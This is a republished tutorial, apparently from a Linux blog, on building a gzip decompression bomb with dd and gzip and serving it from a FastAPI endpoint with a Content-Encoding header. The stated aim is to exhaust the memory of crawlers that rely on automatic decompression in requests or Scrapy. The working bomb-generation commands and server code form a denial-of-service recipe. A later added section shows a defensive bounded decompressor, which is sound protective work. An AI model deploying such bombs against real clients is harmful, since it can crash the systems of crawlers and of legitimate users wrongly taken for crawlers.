How to Use Gzip Compression to Overload Web Crawlers (Gzip Bomb Tutorial)
This guide shows how to create a tiny gzip‑compressed file, serve it with FastAPI, and exploit automatic decompression in Python's requests library to force a crawler to consume massive memory, effectively turning compression into a denial‑of‑service weapon.
Web site owners often suffer from aggressive crawlers that waste bandwidth and CPU; this article demonstrates a retaliatory technique that leverages the automatic gzip/deflate decoding performed by popular HTTP clients such as requests and Scrapy.
First, a simple text file text.txt is created and compressed with the gzip command to produce data.gz:

cat text.txt | gzip > data.gz

A minimal FastAPI server (server.py) is then written to serve the compressed file:

from fastapi import FastAPI
from fastapi.responses import FileResponse

app = FastAPI()

@app.get('/')
def index():
    resp = FileResponse('data.gz')  # served as an opaque file, no Content-Encoding header yet
    return resp

Running the server with uvicorn server:app and requesting the endpoint via requests returns what looks like garbled binary data (the raw gzip bytes) because the response lacks a Content-Encoding: gzip header.
Adding the header fixes the display:

from fastapi import FastAPI
from fastapi.responses import FileResponse

app = FastAPI()

@app.get('/')
def index():
    resp = FileResponse('data.gz')
    resp.headers['Content-Encoding'] = 'gzip'  # tell the client the body is gzip-compressed
    return resp

With the header present, requests automatically decompresses the payload, turning a tiny .gz file into the original large content on the client side.
The compression principle is illustrated: a 192‑character string of repeated "1" can be represented by just five characters, achieving a 97.4% reduction. If a 1 GB file is compressed to 1 MB, the server sends only 1 MB, but the client must allocate the full 1 GB to decompress it, potentially exhausting memory.
Large gzip bombs can be generated with a single command. On Linux:

dd if=/dev/zero bs=1M count=1000 | gzip > boom.gz

On macOS:

dd if=/dev/zero bs=1048576 count=1000 | gzip > boom.gz

These commands create a ~995 KB boom.gz that expands to a 1 GB file when decompressed (gzip -d boom.gz). Adjusting count yields larger or smaller bombs; a demonstration uses count=10 to produce a 10 KB gzip file that expands to 10 MB.
When the FastAPI endpoint serves this 10 KB gzip bomb, a requests call returns a Response object whose memory footprint is about 10 MB, confirming that automatic decompression can be abused to inflate memory usage.
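The same mechanism seen from the client side: any HTTP client or crawler that lets its library decompress the body in full is the one that pays the 1000:1 expansion. The following is an added example (my code, not from the original article or the referenced blog) of how a client bounds that cost: it drives zlib's streaming decompressor with a per-call output limit and aborts once the decompressed size passes a budget, so the memory a server can force on it is capped by the budget rather than by the compression ratio. It uses only the Python standard library; the 10 MB sample bomb is constructed in memory rather than read from boom.gz, and the names (bounded_gunzip, fits_within, compression_ratio) are mine.

```python
import gzip
import zlib

# Constructed sample: 10 MB of zero bytes, gzip-compressed in memory. It stands in
# for the 10 KB boom.gz the article builds with dd/gzip (count=10); no file is needed.
EXPANDED_SIZE = 10 * 1024 * 1024
SAMPLE_BOMB = gzip.compress(b"\x00" * EXPANDED_SIZE)


class DecompressionLimitExceeded(Exception):
    """Raised when the decompressed body would exceed the caller's byte budget."""


def bounded_gunzip(data: bytes, max_output: int, chunk: int = 64 * 1024) -> bytes:
    """Decompress a gzip body without ever holding more than max_output (+ one chunk) bytes.

    A plain gzip.decompress(data) allocates whatever the stream expands to, which is
    exactly what the bomb relies on. Here zlib.decompressobj is driven with max_length,
    so each call yields at most `chunk` bytes of output; input it could not consume is
    handed back in .unconsumed_tail and fed in again on the next round. The budget check
    runs after every chunk, so the server's compression ratio no longer decides how much
    memory the client allocates.
    """
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16+ selects gzip framing
    out = bytearray()
    pending = data
    while not d.eof:
        piece = d.decompress(pending, chunk)
        out += piece
        if len(out) > max_output:
            consumed = len(data) - len(d.unconsumed_tail)
            raise DecompressionLimitExceeded(
                f"output passed {max_output} bytes after only {consumed} compressed bytes"
            )
        pending = d.unconsumed_tail
        if not piece and not pending:
            # No output, no input left, and no end-of-stream marker: the body is truncated.
            raise ValueError("truncated gzip stream")
    return bytes(out)


def fits_within(data: bytes, max_output: int) -> bool:
    """True if the body decompresses within budget, False if the bomb check fires."""
    try:
        bounded_gunzip(data, max_output)
        return True
    except DecompressionLimitExceeded:
        return False


def compression_ratio(compressed: bytes, expanded_size: int) -> float:
    """Expansion factor the client pays for: decompressed bytes per compressed byte."""
    return expanded_size / len(compressed)


if __name__ == "__main__":
    print(f"compressed: {len(SAMPLE_BOMB)} bytes, expands to {EXPANDED_SIZE} bytes "
          f"({compression_ratio(SAMPLE_BOMB, EXPANDED_SIZE):.0f}x)")
    print("fits within a 1 MiB budget:", fits_within(SAMPLE_BOMB, 1 << 20))    # False
    print("fits within a 16 MiB budget:", fits_within(SAMPLE_BOMB, 16 << 20))  # True
```

With requests itself the equivalent defence is to fetch with stream=True, count the bytes that iter_content yields (those are already decoded when Content-Encoding is gzip), and close the response as soon as the running total passes the budget; reading resp.content or calling requests.get without stream=True is what hands the library a blank cheque for memory.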
Important caution: this method should only be applied when the request is confidently identified as coming from a crawler; otherwise legitimate users' clients may be knocked out unintentionally.
References:
Binary Response Content : https://2.python-requests.org/en/master/user/quickstart/#binary-response-content
Website gzip bomb (网站gzip炸弹) – 王春伟's technical blog: http://da.dadaaierer.com/?p=577
This article has been distilled and summarized from source material, then republished for learning and reference.
Liangxu Linux
Liangxu, a self‑taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge—fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply “Linux” to receive essential resources.)